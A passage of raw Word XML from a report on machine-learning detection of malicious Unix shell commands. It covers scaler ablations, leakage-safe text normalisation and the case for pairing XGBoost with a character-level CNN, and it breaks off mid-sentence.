            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uniform contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>the char n-gram block is a sparse 3,000-column TF-IDF matrix; mean-centering it would densify it at no benefit, and trees are scale-invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">the input is integer character indices consumed by a learned embedding layer; the embedding </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> the normalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The honest result: for these models the scaler does nothing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Rather than assert scale-invariance, it was measured. Refitting the production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Random Forest with the scaler removed changes F1 by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0017</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Dataset 1) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0003</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Dataset 2), and ROC-AUC by 0.0001 on both. The same ablation on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isolation Forest returns scores that are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bit-identical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — maximum absolute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>difference exactly 0.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Both results follow from the mechanism. A decision tree's split search evaluates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>candidate thresholds by the partition they induce, so it depends only on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rank order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of each feature's values, and an affine transform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(x − μ)/σ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>preserves rank order exactly; the residual 0.0017 is floating-point noise in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sklearn's threshold enumeration, not a modelling effect. The Isolation Forest is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>even cleaner: it draws its split points uniformly at random across each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>feature's observed range, and an affine map carries that uniform draw onto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>itself, so the same seed produces the same forest on scaled and unscaled input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The honest framing is therefore that **the scaler is a preprocessing contract,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not a modelling decision.** Its value is that every pipeline consuming the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>engineered matrix has one identical shape, so a scale-sensitive learner —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>logistic regression, an SVM, a kNN baseline — can be added to the registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>without anyone having to remember to attach a scaler and risk fitting it outside</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the fold. It costs approximately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>nothing and it buys uniformity. Claiming it improved the tree models would be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>false, and the ablation above is reported precisely so that the claim is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>made.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>A scaling subtlety that Section 5.2 makes real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>There is one place where "scaled correctly" and "scaled usefully" come apart. In</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the cross-dataset evaluation, a model trained on Dataset 1 and applied to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dataset 2 carries its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 1 scaler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with it. That is the correct</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>behaviour — a deployed detector ships with its own preprocessing, and refitting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the scaler on the target corpus at test time would be leakage — but given the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>covariate shift measured in Section 5.2, it means Dataset 2's commands are being</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>centred on Dataset 1's means and divided by Dataset 1's standard deviations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has a different mean and a different class relationship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>entirely, the transformed values are not comparable to anything the model saw in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>For the models in this project that costs exactly nothing, by the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rank-invariance argument. It is recorded because it is a genuine and easily</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>missed failure mode: had the headline detector been distance- or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>gradient-based, a share of the transfer degradation reported in Chapter 8.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>would have been attributable to a stale scaler rather than to the underlying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>distribution shift, and the two would have been very difficult to separate after</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the fact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Text normalisation, and why it is not leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>One normalisation happens outside any pipeline: the command strings themselves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are normalised once at build time (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scripts/build_dataset.py</w:t>
      </w:r>
      <w:r>
        <w:t>) — IPv4 addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and URL hosts replaced by a value derived from a hash of the original, smart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quotes folded to ASCII, control bytes stripped, whitespace collapsed. This runs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>before the train/test split, on both corpora identically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That ordering is safe because the transform is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>stateless and per-row</w:t>
      </w:r>
      <w:r>
        <w:t>: each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>string's output depends only on that string, never on any statistic aggregated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>over the corpus, so no information crosses from test rows to training rows. It</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is applied to both classes and both datasets by the same code path, so it cannot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>introduce a label-correlated artefact — with one documented exception carried</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>forward from Chapter 1.1: hashing addresses per value removed the constant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1.1.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token that an earlier build had made a near-perfect classifier, but</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>"contains an IPv4 address at all" remains a real correlation on Dataset 1, and is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reported as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>P8-source-fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> probe rather than normalised away.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Beyond these, nothing is normalised: no target encoding, no per-source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>adjustment, and no per-dataset constant anywhere in the pipeline. Consistent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>with Section 5.1, every difference between the two corpora's results is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>difference in the data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 6 — Model Selection Justification (XGBoost &amp; 1D-CNN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project pairs two deliberately different learners on the same T1059.004 task: a gradient-boosted tree ensemble over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>engineered behavioral features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>character-level 1D-CNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over the raw command string. They are chosen to be complementary — one interpretable and feature-driven, one representation-learning and syntax-driven — so that agreement between them is meaningful and their disagreements define the edge cases routed to LLM arbitration (Ch. 8.4). In-domain results back the pairing: XGBoost-hybrid reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.871 / ROC-AUC 0.978</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 1 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.846 / 0.965</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 2, while the CNN reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.853 / 0.976</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.841 / 0.960</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 XGBoost on engineered features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Gradient-boosted decision trees are the natural fit for the 43-dimensional engineered feature vector (counts, ratios, entropies, binary-family flags):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Interpretability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tree ensembles expose per-feature gain, so the decision surface is auditable — a first-class requirement for a security detector that a human analyst must trust. Ch. 4's gain ranking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.194, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>redirect_count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.130, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pipe_count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.076) is only possible because the model is inspectable, and it is what let us </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the structural-shortcut risk rather than merely suspect it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Handles mixed feature types.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The engineered features mix bounded ratios (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ∈ [0,1]), unbounded counts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_count</w:t>
      </w:r>
      <w:r>
        <w:t>), and binary flags (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell_bins</w:t>
      </w:r>
      <w:r>
        <w:t>). Trees split on thresholds and never assume a common scale or distribution, so heterogeneous features coexist without one-hot expansion or feature-specific preprocessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scale-invariant.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splits depend only on rank order, so the raw-magnitude features that dominate the variance ranking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>token_len_max</w:t>
      </w:r>
      <w:r>
        <w:t>) need no standardization or log-transform — the exact normalization burden that would sink a linear or neural model on these inputs (Ch. 3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fast and robust.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tree_method='hist'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> training is histogram-binned and near-instant on tens of thousands of rows, and Ch. 7 shows F1 is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>saturated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> across almost the entire hyperparameter grid (~0.71–0.735) — a model that is cheap to retrain and hard to misconfigure, which is an operational asset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chen, T. &amp; Guestrin, C. (2016), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>XGBoost: A Scalable Tree Boosting System</w:t>
      </w:r>
      <w:r>
        <w:t>, KDD '16 — the regularized, histogram-based boosting formulation used here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Character-level 1D-CNN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The CNN operates on the raw command as a sequence of character indices, and character-level convolutions capture shell syntax that a word-level model structurally cannot:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Shell "words" are an open, adversarial vocabulary.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Paths, IPs, random dropper names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
